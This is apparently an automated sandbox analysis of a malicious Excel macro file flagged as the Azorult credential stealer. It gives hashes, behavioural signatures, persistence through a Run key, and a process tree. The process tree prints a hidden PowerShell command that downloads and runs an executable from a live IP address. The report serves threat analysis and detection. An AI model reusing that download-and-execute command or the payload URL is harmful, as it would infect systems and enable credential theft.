Analysis
-
max time kernel
142s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 10:37
Static task
static1
Behavioral task
behavioral1
Sample
Copy0761000025.xlsm
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Copy0761000025.xlsm
Resource
win10v2004-20240226-en
General
-
Target
Copy0761000025.xlsm
-
Size
430KB
-
MD5
7d4ea49144ee2f6e90627e4126dd7906
-
SHA1
435f8134462eeec813c747bf9b8cc7287d3ce05a
-
SHA256
dd6cd10d521f6b189b3a56ce5a7fb41d16c1bca171c00e79999690822b7bfe25
-
SHA512
c88469f3bc48600baf802af246aaf66f4c5d1f00baf619b92ad2e1df7a973b98a396e4f20ccbcec43628122c080ee28a921b61e84fe257efdec7e85ecce4e93d
-
SSDEEP
12288:7fEXQu7SHOCZhSTIS2dGpeWpqivD1YxR25O8UE:7VwarmMSAGMID1R5OtE
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4044 1744 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 35 4044 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
tmp488D.exepid process 4712 tmp488D.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
tmp488D.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Findo = "C:\\Users\\Admin\\AppData\\Roaming\\Findo.exe" tmp488D.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
tmp488D.exedescription pid process target process PID 4712 set thread context of 1008 4712 tmp488D.exe RegAsm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1744 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4044 powershell.exe 4044 powershell.exe 4044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetmp488D.exedescription pid process Token: SeDebugPrivilege 4044 powershell.exe Token: SeDebugPrivilege 4712 tmp488D.exe Token: SeDebugPrivilege 4712 tmp488D.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1744 EXCEL.EXE 1744 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
EXCEL.EXEpid process 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE 1744 EXCEL.EXE -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
EXCEL.EXEpowershell.exetmp488D.exedescription pid process target process PID 1744 wrote to memory of 4044 1744 EXCEL.EXE powershell.exe PID 1744 wrote to memory of 4044 1744 EXCEL.EXE powershell.exe PID 4044 wrote to memory of 4712 4044 powershell.exe tmp488D.exe PID 4044 wrote to memory of 4712 4044 powershell.exe tmp488D.exe PID 4044 wrote to memory of 4712 4044 powershell.exe tmp488D.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe PID 4712 wrote to memory of 1008 4712 tmp488D.exe RegAsm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Copy0761000025.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "http://185.205.187.173/xd/Copy0761000025pdf.exe" -OutFile $TempFile; Start-Process $TempFile;2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\tmp488D.exe"C:\Users\Admin\AppData\Local\Temp\tmp488D.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1008
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4124 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:81⤵PID:1044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
195KB
MD50089e341efa862f22d3af9894d1c5448
SHA14d55c851eccec68786c88b064bcf35c1233393f3
SHA256bfc1cdded42adb884fb46ba53e2f023d0c27d46cf8645614094f5714ebbfb9a8
SHA512ea2c3b6cd6759b11017c58f7948d04fbafc96474190ca2162ff2486dddcd4fc83074ffd055a3367bb783475787cecb6401248344eb0cec787ef7b5dd7fb96ad4